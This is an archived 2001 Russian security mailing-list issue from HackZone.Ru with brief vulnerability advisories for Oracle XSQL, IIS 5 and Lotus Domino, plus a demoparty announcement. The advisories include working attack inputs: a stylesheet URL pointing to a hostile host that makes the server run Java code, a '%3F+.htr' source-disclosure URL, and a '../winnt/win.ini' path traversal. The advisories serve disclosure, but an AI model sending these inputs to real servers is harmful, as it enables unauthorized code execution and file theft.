Отправляет email-рассылки с помощью сервиса Sendsay

BugTraq: Russian Security Newsline

  Все выпуски  

BuqTraq: Russian Security Newsline


Служба Рассылок Subscribe.Ru проекта Citycat.Ru

HackZone.Ru

RC5 HackZone Team

HackZone.Ru/TOP



Рассылки Subscribe.Ru
BuqTraq: Обозрение
BuqTraq: Alert
BuqTraq: Russian Security Newsline
BuqTraq: Бред сивой кобылы
BugTraq: Закон есть закон
HackZone.Ru: новости сайта
Новости 911
ЕжеПравда
Новости из мира распределенных систем

Russian Security Newsline:


Oracle 8.1.7 позволяет несанкционированно исполнять удалённые сервлеты.
/HackZone.Ru/RSN Forum 10.01.2001 13:18:51/:

Oracle XSQL servlet позволяет несанкционированно исполнять удалённые сервлеты. Это происходит 1) из-за возможности указывать внешние таблицы стилей

http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

2) возможности вставлять в последние объекты java.

<xsl:xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
...
<xsl:variable name="str1" select="jstr:new('java on the server')" />
...


MindResourses 2001
/dl 10.01.2001 03:08:42/:

3-4 ф! евраля в Москве пройдет demoparty MindResourses 2001. Оно обещает быть одним из крупнейших событий на российской демосцене за последние два года.
О своем участии уже заявили такие известные группы как Proxium, T-Rex, Hrg, Accept Core, Energy, WRC, Hbg.
Ожидаются и новые лица, приглашаются все желающие, гарантируются реальные призы и подарки.


Очередная ошибка IIS 5
/HackZone.Ru/RSN Forum 9.01.2001 03:54:06/:

Очередная ошибка IIS 5 позволяет просматривать CGI файлы добавляя ("%3F+.htr")

http://TARGETIIS/scripts/test.pl%3F+.htr


Набор ошибок в Lotus Domino
/HackZone.Ru/RSN Forum 9.01.2001 03:51:58/:

Обзор RSN Forum:
1)Обратный путь в Lotus Domino 5.0.5 Web Server позволяет читать системные файлы
"http://TARGETDOMINO/.nsf/../winnt/win.ini" Georgi Guninski

2)Однажды ауторизовавшись пользователь Lotus Domino путём подмены ответа/запроса может читать почтовый ящик ЛЮБОГО пользователя - Michal Zalewski







Ведущий рассылки - Дмитрий Леонов
http://www.compulog.ru, http://www.hackzone.ru


http://subscribe.ru/
E-mail: ask@subscribe.ru
Поиск

В избранное